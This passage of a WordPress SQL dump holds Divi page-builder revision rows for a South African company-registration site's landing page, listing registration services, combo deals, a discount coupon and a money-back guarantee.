header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 11:30:33','2019-08-08 09:30:33','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32407,0,'2019-08-08 10:35:41','2019-08-08 10:35:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4bfbebc5e991.18099979-ryFM0oQOJ2SgdFP2FAMworszHD5cmAgO','','','2019-08-08 12:39:39','2019-08-08 10:39:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32407',0,'scheduled-action','',3),(32408,0,'2019-08-08 10:35:41','2019-08-08 10:35:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4bfbebd10d88.97123304-pPUTRed2Pwnf4FOsfHbA5WzIvKKToQBa','','','2019-08-08 12:39:39','2019-08-08 10:39:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32408',0,'scheduled-action','',3);
INSERT INTO `wpxb_posts` VALUES (32420,3,'2019-08-08 15:11:20','2019-08-08 13:11:20','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\" box_shadow_style=\"preset7\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-12px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-24px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:11:20','2019-08-08 13:11:20','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32422,3,'2019-08-08 15:15:59','2019-08-08 13:15:59','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button 